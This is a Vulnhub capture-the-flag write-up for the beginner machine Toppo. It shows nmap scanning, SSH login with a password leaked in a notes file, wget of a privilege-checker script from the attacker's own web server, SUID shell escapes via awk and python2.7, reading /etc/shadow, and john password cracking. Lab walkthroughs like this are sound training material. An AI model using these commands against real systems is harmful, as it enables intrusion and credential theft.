Vulnhub Write-up — Toppo
This is the write-up of the Machine Toppo from Vulnhub.
DIGEST
Toppo is a beginner friendly machine based on a Linux platform. With the help of note.txt from the admin got the user and exploiting SUID Executables to gain the Root.
Machine Author: Hadi
Machine Type: Linux
Machine Level: Beginner
data:image/s3,"s3://crabby-images/47e2a/47e2ab9bd346dc8a7adcc0ff1661c3046fe284df" alt=""
The IP address is given so no need for netdiscover.
Scanning The Network
nmap -sC -sV 192.168.0.103
data:image/s3,"s3://crabby-images/0714c/0714cb36ab84ea9574f64b9406f7067a5d7d40b4" alt=""
data:image/s3,"s3://crabby-images/a2a53/a2a535c731edcf5dfdde069092e2241cee69d78b" alt=""
Dirbuster on port 80
data:image/s3,"s3://crabby-images/b93cd/b93cd982db33ac50516045d323a17fa15a9b2727" alt=""
Got the notes.txt under admin directory.
data:image/s3,"s3://crabby-images/331b5/331b58d6744ae1d17a61a15857f7a129d12c41b0" alt=""
Above notes gives us the password:- 12345ted123
So let's try to guess the username ted and try to login into ssh.
Own User
data:image/s3,"s3://crabby-images/5e3e8/5e3e8383311a11a63a88876cfdafc1844ad07e85" alt=""
$whoami ;id
data:image/s3,"s3://crabby-images/5cee2/5cee24e363dfc2fa307fb08c0bb8920a1cdf93eb" alt=""
data:image/s3,"s3://crabby-images/3fece/3fece9e954687e96e10633b037970f95be1827dd" alt=""
Privilege Escalation
I am using this script to find out the privilege escalation methods.
$python -m SimpleHTTPServer
Starting the web server locally to upload the privchecker on the toppo machine.
data:image/s3,"s3://crabby-images/6febf/6febf634841fadb8a1677fecf82aeedf0bd3d3f7" alt=""
data:image/s3,"s3://crabby-images/829c0/829c08e466bdf0ed44f71dd91749fcd994600556" alt=""
Finding the Host machine IP address.
data:image/s3,"s3://crabby-images/a47a6/a47a6a4f308765213730e0bf4316eea60159ed7e" alt=""
Downloading the script on the machine(toppo)
$wget http://192.168.0.105:8000/linuxprivchecker.py
data:image/s3,"s3://crabby-images/39cec/39cec909b800d777d4a77793aa3c97a31e753676" alt=""
data:image/s3,"s3://crabby-images/dce2f/dce2f69795144df842f8ac80c7d48f40acc5c1da" alt=""
$chmod +x linuxprivchecker.py
$ ./linuxprivchecker.py
Running the script on toppo.
data:image/s3,"s3://crabby-images/8ffec/8ffec85689860fb85b8d4217159dc4630d03ac35" alt=""
It will give some way to Escape Sequences, I am trying using awk, you can try any of them.
data:image/s3,"s3://crabby-images/f525b/f525bd92d88542ab8c39ff3f792f6e82db94fc64" alt=""
Root using awk
$ awk 'BEGIN{system("/bin/sh")}'
data:image/s3,"s3://crabby-images/3b780/3b78075f839672067f84fd82795986c92e7a0cb8" alt=""
data:image/s3,"s3://crabby-images/c4a9f/c4a9ff92b71c22f21c41c161a51c6db06c5be3e3" alt=""
/bin/bash did not give us root, this is because bash has privilege escalation protection. but there is no such thing in /bin/sh.
Let's try a different method for Privilege Escalation while searching on the internet I found this article.
Root using python
find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null
data:image/s3,"s3://crabby-images/d124a/d124a8f7f29229e114580733d564fbf1b16ad6db" alt=""
data:image/s3,"s3://crabby-images/d0b73/d0b73665627ee3cb437c93aab8c33da9fee2d387" alt=""
python2.7 can exploitable. See the SUID bits
$python2.7 -c “import pty; pty.spawn(‘/bin/sh’);”
data:image/s3,"s3://crabby-images/2aca0/2aca00221f69dbce0b4ffa54e62253ac843e0253" alt=""
Cracking the root password
$awk 'BEGIN{system("cat /etc/shadow")}'
data:image/s3,"s3://crabby-images/f2e48/f2e48510ffbe2eeb743095bb72648092f7d0075d" alt=""
awk 'BEGIN{system("cat /etc/passwd")}'
data:image/s3,"s3://crabby-images/5db5c/5db5cf78287886f17782c2d870a3de5e0a3d3ddb" alt=""
$unshadow passwd shadow < crack
data:image/s3,"s3://crabby-images/afe00/afe00c0f16b3a34d0376553234e00401532d2ec6" alt=""
data:image/s3,"s3://crabby-images/f18d7/f18d7cdf2c7229528668d5615639ab91f3127415" alt=""
john --wordlist /usr/share/john/password.lst crack
data:image/s3,"s3://crabby-images/5671a/5671a9f1df0a68fa82ea54dea48fa99c3edbe801" alt=""
data:image/s3,"s3://crabby-images/e1419/e1419baeb56af5d18b0d33769ecfc62df42c40ff" alt=""
john --wordlist /usr/share/john/password.lst crack --format =sha512crypt
data:image/s3,"s3://crabby-images/cd008/cd008408e59d053fd2a8209531103360003cf2f7" alt=""
Own Root
data:image/s3,"s3://crabby-images/32371/32371afd852369036361767f4c7a34ff1ce82f72" alt=""
data:image/s3,"s3://crabby-images/c94f9/c94f91a33bed7415f890bd8fc11d30d6fb42e626" alt=""
0wnedlab{p4ssi0n_c0me_with_pract1ce}